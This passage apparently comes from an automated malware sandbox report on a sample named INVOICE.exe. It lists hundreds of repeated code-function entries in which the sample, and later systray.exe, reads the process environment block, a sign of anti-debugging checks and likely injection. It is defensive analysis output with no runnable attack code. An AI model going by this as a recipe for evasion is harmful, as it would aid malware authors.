          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B34257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B75BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B523E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B62D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B58DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B26DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B2A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B23540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B53D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B70EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B5FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B61608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B6AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B27794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00AA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B3FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ADA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B7070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ACF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00B78F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\INVOICE.exeCode function: 1_2_00ABEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_047FAC7B mov eax, dword ptr fs:[00000030h]
